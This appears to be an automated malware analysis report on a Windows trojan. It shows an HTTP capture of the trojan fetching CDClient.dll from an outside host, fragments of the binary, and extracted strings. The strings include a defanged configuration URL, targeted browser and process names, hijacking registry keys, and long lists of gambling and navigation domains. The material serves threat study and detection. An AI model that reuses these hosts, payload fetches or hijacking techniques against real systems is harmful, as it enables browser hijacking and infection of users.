..e{ .......@$<.......V.L..3.m.;}.sZ....F&......U.;.....u0Q.U.M
<<< skipped >>>


HEAD /d2/CDClient.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Wed, 24 May 2017 09:39:55 GMT
Server: kangle/2.9.6
Last-Modified: Wed, 24 May 2017 04:06:16 GMT
Content-Type: application/octet-stream
Content-Length: 957440
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
....


GET /d2/CDClient.dll HTTP/1.1


Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Wed, 24 May 2017 09:39:55 GMT
Server: kangle/2.9.6
Last-Modified: Wed, 24 May 2017 04:06:16 GMT
Content-Type: application/octet-stream
Content-Length: 957440
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
DUP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
..............................@..........................@............
..................................,...R.......m....................0..
......................................................................
..............CODE.............t......PEC2^O...... ....rsrc....0......
."...x.............. ....reloc.......0......................@.........
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
................................................b.. .........c....X...
......b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7i..
...8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.*{?
..@...a..w..Q.s...."..\...3KO.w.....V.....^.#b.l......<.q.C<....
...].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K...}M.I..
.Gi..A>.L..j3..{..=.....Q.fG.{...?.A.G.q...Q............9..\..R....
...O.....X}l5.z..P.M....:.73.S..h.i.]S7~0.H...4..C..U..En.>.]`/....
.H.T....j..`.;......sT..8B..E.S& ..l.p..dz.^p.5za...r...@..1WS....
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

f23bb1c179d6ccab543d15af98e5eea.exe_260:

.idata
.rdata
P.reloc
P.rsrc
.aspack
.adata
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
%s[%d]
1.2.8
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFileL"C
OnGetPassword
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError|.C
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP@sC
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptions<sC
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
%d.%d.%d.%d
;8=$:$:$;
b~~z0%%cz$ik~x$id%
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
KERNEL32.DLL
NTDLL.DLL
Uhd%D
TIdUDPBase
IdUDPBase
255.255.255.255
TIdUDPClient
IdUDPClient
Port<
Ínor%o|od~
hXXp://
Ínor%mo~ilm5cn7
http/1.1 404
2$:$:$;3
inflate 1.2.8 Copyright 1995-2013 Mark Adler
;3 #>6.&
'2, / 0&7!4-)1#
333333333
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegEnumKeyExA
GetCPInfo
version.dll
MsgWaitForMultipleObjects
GetProcessHeap
ntdll.dll
URLMON.DLL
UrlMkGetSessionOption
shell32.dll
wsock32.dll
ADVAPI32.DLL
Rpcrt4.dll
KWindows
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
UrlMon
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
urlmon.dll
rpcrt4.dll
<requestedExecutionLevel level="requireAdministrator"/>
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
Operation would block.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
ECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value('%s' is not a valid floating point value
I/O error %d

f23bb1c179d6ccab543d15af98e5eea.exe_260_rwx_0045F000_00003000:

kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
advapi32.dll
oleaut32.dll
version.dll
ntdll.dll
urlmon.dll
shell32.dll
wsock32.dll
rpcrt4.dll
GetKeyboardType
UrlMkGetSessionOption
<requestedExecutionLevel level="requireAdministrator"/>

f23bb1c179d6ccab543d15af98e5eea.exe_260_rwx_005F0000_00003000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

f23bb1c179d6ccab543d15af98e5eea.exe_260_rwx_029B1000_0019E000:

kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
ole32.dll
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port8
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
Port
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdStrings.pas
TIdTCPServer
IdTCPServer
CmdDelimiter
TIdTCPServerConnection
DefaultPort(#
OnExecuted{
EIdTCPServerError
EIdNoExecuteSpecified
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPassword8
EIdOSSLLoadingRootCertError|
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponsel
TIdHTTPRequest
TIdHTTPRequest$
TIdHTTPProtocol8
TIdCustomHTTP
TIdCustomHTTP8
TIdHTTP
TIdHTTPh
HTTPOptions
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
OnKeyDown$g
OnKeyPress
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
AutoHotkeys
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
olepro32.dll
IWebBrowser
IWebBrowserApp
IWebBrowser2T
bstrUrlContext
bstrUrl
#TInternetExplorerWindowSetResizable
TInternetExplorerWindowSetLeft
TInternetExplorerWindowSetTop
TInternetExplorerWindowSetWidth
TInternetExplorerWindowSetHeight
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTopL
OnWindowSetWidth
OnWindowSetHeight
\DLL\SHDocVw.pas
DefaultInterface is NULL. Component is not connected to Server. You must call 'Connect' or 'ConnectTo' before this operation
1.2.8
PSAPI.dll
TIdUDPBase
IdUDPBase
255.255.255.255
TUDPReadEvent
TIdUDPListenerThread
TIdUDPServer
TIdUDPServerL
IdUDPServer
DefaultPort
OnUDPRead
TIdUDPClient
TIdUDPClient,
IdUDPClient
Port<
TMyBrowserCheckOpenUrl
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
hXXp://udo.jxwan.com/index/getcfg?id=
baidu.3v32.com
.qq.com/
Ínor%o|od~
WS2_32.dll
DNSAPI.dll
iexplore.exe
iexplora.exe
Chrome.exe
f1browser.exe
360se.exe
360chrome.exe
360sa.exe
360chroma.exe
SogouExplorer.exe
UCBrowser.exe
windows\system32\svchost.exe
\Windows\SysWOW64\svchost.exe
dllhost.exe
svchost.exe
*.dll
684EF56E-2FAE-4ed2-BF46-F0440C5BE24F
%WinDir%\sysnative\
GameLogin\
<meta http-equiv="Content-Type" content="text/html;charset=gb2312">
8:;9$8$;$;
ntdll.dll
ADVAPI32.dll
RPCRT4.dll
Secur32.dll
USER32.dll
GDI32.dll
msvcrt.dll
SHLWAPI.dll
SHELL32.dll
iertutil.dll
urlmon.dll
OLEAUT32.dll
IMM32.DLL
LPK.DLL
USP10.dll
IEFRAME.dll
WININET.dll
Normaliz.dll
ws2_32.dll
WS2HELP.dll
VERSION.dll
mswsock.dll
iphlpapi.dll
comdlg32.dll
rasadhlp.dll
MSCTF.dll
xpsp2res.dll
appHelp.dll
CLBCATQ.DLL
COMRes.dll
RASAPI32.dll
rasman.dll
NETAPI32.dll
TAPI32.dll
rtutils.dll
WINMM.dll
USERENV.dll
msv1_0.dll
cryptdll.dll
sensapi.dll
msctfime.ime
IEUI.dll
MSIMG32.dll
msimtf.dll
psapi.dll
SETUPAPI.dll
cscui.dll
CSCDLL.dll
oleacc.dll
xmllite.dll
msfeeds.dll
hnetcfg.dll
wshtcpip.dll
MLANG.dll
SXS.DLL
actxprxy.dll
rsaenh.dll
mshtml.dll
msls31.dll
iepeers.dll
WINSPOOL.DRV
ImgUtil.dll
pngfilt.dll
Dxtrans.dll
ATL.DLL
ddrawex.dll
DDRAW.dll
DCIMAN32.dll
Dxtmsft.dll
jscript.dll
msxml3.dll
CRYPT32.dll
MSASN1.dll
%Program Files%\Internet Explorer\xpshims.dll
%Program Files%\Internet Explorer\ieproxy.dll
Open Url:
DNF.exe
Client.exe
Launcher.exe
QQ.exe
YY.exe
qqbrowser.exe
Juzi.exe
2345chrome.exe
twchrome.exe
opera.exe
115Chrome.exe
Ruiying.exe
SaaYaa.exe
LolClient.exe
ADSafeSe.exe
winloader.exe
Droid4xSW.exe
MobileSimulate.exe
MONIwan.exe
AndroidEmulator.exe
UrlAD:
VVV.baidu.com/s?
Get url Err...
explorer.exe
HintSock.dll
VVV.998wan.com
sogou.com
VVV.sogou.com/index.htm?pid=
Software\Microsoft\Internet Explorer\TypedURLs
-AAB6-4EFB-8BD1-
VVV.sun0769.com
VVV.hg6288.com
2.0.2.9
RestoreTCP
C:\Windows\sysnative\drivers\kWppProxy.sys
hXXps://VVV.baidu.com/index.php?tn=76035124_3_pg
VVV.baidu.com/index.php?tn=4
VVV.baidu.com/index.php?tn=98012088_dg
VVV.baidu.com/index.php?tn=02049043_32_pg
hXXps://VVV.baidu.com/s?word={searchTerms}&tn=
123.sogou.com/?
hXXps://VVV.sogou.com/sie?
VVV.sogou.com
Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\baidu.com
UDO.EXE
BarClient.exe
adsec.exe
HC\hCard\adsec.exe
BarClientView.exe
msdialg100_D.dll
mk~$id%ss
mk~$idþf
dwz.cn/
b~~z0%þhhs$mi=9$ieg
b~~z0%%xoieggodn$r
*VVV.tyc[0-9].com*
*VVV.tyc[0-9][0-9].com*
*tyc[0-9][0-9][0-9].com*
*tyc[0-9][0-9][0-9][0-9].com*
*VVV.[0-9]tyc.com*
*VVV.[0-9][0-9]tyc.com*
*[0-9][0-9][0-9]tyc.com*
*[0-9][0-9][0-9][0-9]tyc.com*
*VVV.sun[0-9].com*
*VVV.sun[0-9][0-9].com*
*sun[0-9][0-9][0-9].com*
*sun[0-9][0-9][0-9][0-9].com*
*VVV.[0-9]sun.com*
*VVV.[0-9][0-9]sun.com*
*[0-9][0-9][0-9]sun.com*
*[0-9][0-9][0-9][0-9]sun.com*
*VVV.sb[0-9].com*
*VVV.sb[0-9][0-9].com*
*sb[0-9][0-9][0-9].com*
*sb[0-9][0-9][0-9][0-9].com*
*VVV.[0-9][0-9]sb.com*
*VVV.[0-9][0-9][0-9]sb.com*
*[0-9][0-9][0-9][0-9]sb.com*
*VVV.hg[0-9][0-9].com
*VVV.hg[0-9][0-9][0-9].com
*hg[0-9][0-9][0-9][0-9].com*
*hg[0-9][0-9][0-9][0-9][0-9].com*
*hg[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.ra[0-9].com*
*VVV.ra[0-9][0-9].com*
*VVV.ra[0-9][0-9][0-9].com*
*ra[0-9][0-9][0-9][0-9].com*
*js[0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.xpj[0-9][0-9].com*
*xpj[0-9][0-9][0-9].com*
*xpj[0-9][0-9][0-9][0-9].com*
*xpj[0-9][0-9][0-9][0-9][0-9].com*
*bet[0-9][0-9][0-9].com*
*bet[0-9][0-9][0-9][0-9].com*
*VVV.s8s[0-9].com*
*s8s[0-9][0-9].com*
*s8s[0-9][0-9][0-9].com*
*s8s[0-9][0-9][0-9][0-9].com*
*s8s[0-9][0-9][0-9][0-9][0-9].com*
*s8s[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.s8s[0-9].me*
*s8s[0-9][0-9].me*
*s8s[0-9][0-9][0-9].me*
*s8s[0-9][0-9][0-9][0-9].me*
*s8s[0-9][0-9][0-9][0-9][0-9].me*
*s8s[0-9][0-9][0-9][0-9][0-9][0-9].me*
VVV.baidu.com/favicon.ico
VVV.hao123.com/favicon.ico
VVV.gzmxol.com/dhh_launcher/
.com/favicon.ico
link?url=
üda%
hao.k6kb.xyz
VVV.2345mini.com
hao.91wanyx.lol
wb.91wanyx.lol
VVV.wb988.com
hlybar.com
ie.17kanyx.cc
xqj-net.com
5500w.com
mk.vee9.com
VVV.58wangwei.com
hao.webnav.top
iehome.ssoor.com
gmrb.com.cn
VVV.hao522.com
hao522.com
icafedh.com
baibu.com
ieadd.adkuai8.com
index.jj123.com.cn
index.hao2016.net
hao.169x.cn
169x.cn
VVV.qidiannet.cn
ok.32wb.com
wbspdh.wicp.net
netbar.6-6.cn
42.62.30.180
dwz.cn
VVV.9973.com
9973.com
61.160.250.4
VVV.msn.com
msn.com
VVV.baiduso.com
baiduso.com
index.114wb.net
cdc.114wb.net
114wb.net
123.yhkj9.com
index.58toto.com
ieadd.uc916.com
uc916.com
VVV.apyw.net
VVV.aiwbnet.net
VVV.yaojyw.net
VVV.gt18z.com
union.17lot.com
17lot.com
VVV.v6669.cn
index.icafevip.com
www1.7899987.com
7899987.com
0.baidu.com
VVV.52daohang.com
52daohang.com
index.56wanyx.win
56wanyx.win
VVV.369k.net
227237.com
desk.nmenu.cn
nmenu.cn
yuanyang.d9media.cn
VVV.826826.com
web.sogou.com
123.161gg.com
go.microsoft.com
VVV.114la.com
114.huo99.com
m.browser.baidu.com
index.51wanyx.net
51wanyx.net
index.52icafe.com
52icafe.com
VVV.19so.cn
bmywm.com
interface.wx-media.com
wx-media.com
index.iwb110.com
iwb110.com
17huohu.com
i.17huohu.com
i.firefoxchina.cn
cn.hao123.com
VVV.so26.com
VVV.560560.com
www1.baidu.com
VVV.wz58.com
2345n.sogoulp.com
index.icafe66.com
VVV.jlshoping.com
VVV.hnshoping.com
cn.msn.com
VVV.bmywm.com
sogoulp.com
hao.5in8.com
VVV.5334.com
123.k6kb.xyz
.91wanyx.lol
VVV.hlybar.com
.114wb.net
wbsite2016.net
.hao522.com
VVV.icafedh.com
.hao2016.net
daohang2016.com
pownet.net
42.62.30.180/
dwz.cn/OXHad
d9media.cn
web.sogou.com/?
VVV.hao123.com/?tn=
cn.hao123.com/?tn=
VVV.baidu.com/?tn=
VVV.baidu.com/index.php?tn=
VVV.baidu.com/home?dsp=netbar&tn=
VVV.sogou.com/index.htm?pid=sogou-netb-d
VVV.bmywm.com/sg
hao.360.cn/?
123.sogou.com/?71066-
123.sogou.com/?71084-
123.sogou.com/?71013
123.sogou.com/?71021
123.sogou.com/?71032
VVV.sogou.com/index.htm?pid=sogou-netb-c
VVV.pc918.net
index.woai310.com
VVV.sogou58.com
VVV.tao123.com
VVV.dh18.com
huo99.com
hao123.cdsoso.net
VVV.2345.com/?
VVV.soso.com/?unc=
VVV.soso.com/wbhp.shtml?unc=
VVV.soso.com/wbhp.shtml?cid=union.s.wh&unc=q
VVV.youdao.com/n3/?keyfrom=netb.yiyong&vendor=netb.yiyong_
VVV.sogou.com/index.htm?pid=sogou-netb-1
VVV.sogou.com/index.htm?pid=sogou-netb-3
VVV.sogou.com/index.htm?pid=sogou-netb-4
VVV.sogou.com/index.htm?pid=sogou-netb-6
VVV.sogou.com/index.htm?pid=sogou-netb-7
VVV.sogou.com/index.htm?pid=sogou-netb-8
VVV.sogou.com/index.htm?pid=sogou-netb-9
VVV.sogou.com/index.htm?pid=sogou-netb-2e7c
VVV.sogou.com/index.htm?pid=sogou-netb-b
VVV.sogou.com/index.htm?pid=sogou-netb-c20
VVV.hao123.com/?tn=96012662_hao_pg
VVV.hao123.com/?tn=96994152_hao_pg
123.sogou.com/?71063-5
VVV.hao123.com/?tn=99123885_hao_pg
VVV.hao123.com/?tn=94287050_hao_pg
VVV.hao123.com/?tn=92823465_hao_pg
VVV.hao123.com/?tn=93908426_hao_pg
VVV.hao123.com/?tn=90567778_hao_pg
hao123.com/?tn=91163052_hao_pg
123.sogou.com/?71069-1004
VVV.baidu.com/s?tn=32
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\dnsset
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\ZWebNds
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\stans
doutray.pdb;
llpro.dll;SeBrowser.dll;IeBrowserEx.dll;Hintf1d.dll;$F09DA8BE96,$61C38F9711;$12CBBF0EC73,$6D2E1BEF02;$D667E38E84,$429A944374;$F5CE5DEB07,$6603847B05;shadowbrowser.dll;shadowbrowser64.dll;
setprox.dll;$D8F1CE9F45,$5DBDA6FB19;$F029D22D98,$499AB4745D;$D6D16940E7,$55E55977AD;$DE1B21F3F3,$57BA15CAD0;$FE19F91D36,$4F9F651426;$D54D673CEE,$5930917415;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;$F6A81C182C,$44B775E5D5;$DB8F7C8E06,$5136D67B4D;
$E3A98697D3,$64B9525505;$EC6AA2F429,$61290336F9;$DBE0A719CB,$55C7A99C24;xyIeBrowserEx64.dll;xyIeBrowserEx.dll;$DEA30A04DE,$532AE2575E;$11CA43E231A,$3553DF44D;setprox64.dll;iebrowserex64.dll;$F8B2783F67,$5CD420FAE9;$D8F1CE9F45,$5DBDA6FB19;
ClassHelper64.dll;$107394245FE,$8196FE5AFD;$E9C88C8864,$557C2A0D84;$DF40EAEC61,$51EEBA0A04;$D954616772,$5885AAFC81;$DB6878D997,$6020424E3E;$2004B09DA,$18EE2EABA3;$D900AAC5C1,$56B846C6F5;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;
$E686C4CB83,$549B9881F3;$123076BB9E5,$63C11BA1B9;$110128099F3,$47CEEE3B04;$ED1DE61550,$51285D60D1;$10CCA5BA968,$52A7D11BA1;$E09B8D30CB,$4F6A65C1A5;$128E8727207,$666DC972F4;redl.dll;$E346DC856A,$51C7617796;$E26F9AF66F,$5E96B00269;$F2FBFA2B33,$537CD26F98;
2345WebProtect
$55101FA7,$87F5D674;$552FC0D0,$881804CC;$5556ECD7,$883CD655;shadowbrowser.dll;$5580C11B,$885AC5D7;$55A316C0,$88818963;$55ACB9D3,$86E18FD2;$557FC656,$86DAA61B;$55B9E5C2,$889F9DBF;$549A873A,$87359EC7;$55D2FC4F,$88B83B70;
$563365F0,$88ECECC3;$549A873A,$87359EC7;$563043CB,$878CA073;$56211FC3,$88DAB657;$55E743A6,$89287619;$5618E898,$88A81031;xyIeBrowserEx.dll;$555C32F1,$88007C70;ProcessHelperWin32.dll;setprox.dll;$55F05A6E,$88D1483C;$55EF9678,$887DED79;
$566E2971,$822ADD8D;$566BB5C9,$88FD25B0;$5649564F,$82030AC8;$52D7749C,$8410FC0A;$5635F79B,$8778CD3B;$55CC53DF,$871EA0C8;$54059963,$854B07CC;$565273FA,$820C7A6B;$56175BED,$88AA686F;$563C1A47,$8778D1F1;$544A1AA4,$86BE90CD;nbie.dll;
$56A9AEEE,$8277D728;$556FD8F3,$884989E3;$572B3DE5,$89FC6E36;$573406D5,$830D9B8B;$572D881E,$8307AA7B;$572B17B6,$886F34AF;$570F9E92,$89DA4694;redl.dll;$570CA22E,$884C5DEB;$5710B2E1,$82EA4A8E;$55EFD26E,$8A31E327;$563B2855,$88F53B9C;$55E743A6,$89287619;
levram.dll;$585A4114,$844FF124;$5848ECB9,$843D7CB8;$583C013B,$897F3672;$583553A9,$8989C64F;$00000000,$313E0221;$582435BA,$8417E647;$57FB091F,$8A9C56E2;$57EB753C,$83DDE427;$57CE2D72,$8A7954CB;$57E1041F,$83D44996;$57D278E8,$83AF7D19;$57CBD35C,$83A8239C;
iehelper.dll;msdmo.nls;$2A425E19,$E532110D;$2A425E19,$E533CBAE;$2A425E19,$E5341A95;$2A425E19,$E5352366;$5281D8C1,$8505E31E;$526A2B67,$84F2FF48;$53E5E35B,$856EB8A4;
IEOPTimize.dll;swaddresbar.dll;swntrace.dll;c_2987.nls;ilovehint2.dll;orient.dll;ilovehint.dll;
snqu_proxy_X64.pdb;BACK.pdb;
MainProX.exe*5C9389C539DDEAFFA58BF110B8ED8F03
wxpro.dll
Busiwork.dll
swaddresbar.dll
loguser.dll
WxVSafe.dll
lolhelper.dll
wxcore.dll
rmserver.exe
exploren.exe
services.exe
lexplore.exe
fbrowser.exe
qqbrowse.exe
360chrom.exe
TaBrowse.exe
Explore.exe
taskmgr.exe
tasklis.exe
Service.exe
NOTEPAD.EXE
control.exe
conhost.exe
clipbrd.exe
command.com
comhost.exe
comtrol.exe
taskmur.exe
Explone.exe
Servlce.exe
contool.exe
connost.exe
fbrowse.exe
Browser.exe
Firefox.exe
lsans.exe
cacis.exe
clsvc.exe
netst.exe
xuean.exe
Brows.exe
Sogou.exe
lleba.exe
ADMon.exe
Chrom.exe
csrss.exe
baidubrowser.exe
2345Explorer.exe
liebao.exe
Maxthon.exe
TheWorld.exe
TaoBrowser.exe
7chrome.exe
FastIE.exe
350chrome.exe
ttraveler.exe
MiniIE.EXE
VVV.hao123.com
VVV.baidu.com
mpxlks.net
b9988111.com
VVV.66440.com
VVV.66441.com
VVV.06543.com
VVV.82468.com
axlinyi.com
139vvv.com
s2668.com
s3668.com
s1399.com
s5456.com
s0456.com
s6799.com
s7166.com
00003801.com
0006163.com
0008109.com
002002m.com
0032138.com
006yth.com
010716.com
0112828.com
0151.cm
027sfst.com
029zhuangshi.com
0316ga.com
0329c.com
0471am.com
050ab29.com
0512bgy.com
0750fan.com
0756sys.com
1006163.com
1115866.com
111f11.com
111scweb.com
11663801.com
119.145.148.100
123cc222.com
123cc333.com
123cc444.com
123hiwei.com
168111777.com
172.247.41.24
173.255.138.123
18dj18.com
1bet999.com
1hgp.com
1p111.com
20070022.com
20071199.com
2007901.com
2055aaa.com
2130.qg790.com
2221402.com
248vip.com
2500fp.com
25175704.com
2770003.com
28365365.com
28456.cc
29salon.com
2p222.com
3040168.com
3067k.com
307858.com
3308z.com
3344bh.com
33aa402.com
36466a.com
3648918.com
365bet.mobi
3670239.com
3939053.com
3939071.com
3q511.com
4006118588.com
4050789.com
405475.cc
4213333.cc
4444kk.com
45.61.250.46
47.89.30.97
478vip.com
5060001.com
517888.cc
517888.net
51taotaoyou.com
51ujk.com
520hghg.com
53030055.com
5345yy.com
55502504.com
555050.com
5555.ht
5556163.com
55gg163.com
57jsc.com
58757.com
59bo.cc
59bo.com
6.kle5.com
600.cc
6060128.com
6163yyy.com
617888.cc
63777b.com
63bdg.com
6585226.com
66.133.87.55
6677.us
66bcdf.com
66pp66.com
6767385.com
6x6js.com
700624.com
7108ee.com
727330.com
741580.cc
76055a.com
79bo.com
80651.com
81581501.com
81808188.com
84805.net
85850z.com
860923.top
86666.8994.com
87dianping.com
8800y9.com
882828.cc
882828.net
885858.cc
886868.net
88jt03.com
88jt09.com
88jt33.net
88jt66.com
88jt88.com
88pjdc.com
8e789.com
9000402.com
935msc.com
94bo.net
959900009.com
95990011.net
95990044.cc
95990777.net
9599110.com
9599112.com
9599221.com
9599223.com
95992828.cc
95992828.net
9599333.com
95993333.cc
95993838.cc
95993838.net
9599550.com
95995511.net
95995566.net
95995858.cc
9599664.com
95996666.net
95996868.cc
95996868.com
95997878.cc
95998888.cc
9599889.net
9599aaa.com
9599hh.net
9599mm.net
9599qq.com
95jyb8.com
95zz00.com
95zz08.com
95zz11.com
95zz44.com
95zz88.com
9663553.com
9882011.com
99029k.com
9910z.com
9911tyc.com
991991.cc
9927qqq.com
99333666.com
9955sbd.com
9988sj.com
999202.com
99966524.com
99zz222.com
a52022.com
aaa01234.com
aaa555050.com
ad.050122.com
ad.148021.com
ad.517dapai.com
ag711.cc
aibo68.com
amjs58.com
amws1199.com
anyaoying.com
aobo00.com
aobo8.net
aoya113.com
aoyayule.com
arsenal.com.cn
asiabet11.com
avzylu.com
ay159.com
aygj587.com
aygj77.com
b1888.cc
b2888.cc
b365444.com
b9888.cc
bb565.net
bbbcmp8.com
bdg251.com
ben5588.com
ben7777.com
bet007.com
betping.net
betvictor61.com
bf.90ko.net
bifa1357.com
bifa7777.com
binfencai.com
biz5.sandai.net
bjmyql.com
blm0000.com
blr0088.com
bmw.39960005.com
bmw55.com
bmw999555.com
bmw999888.com
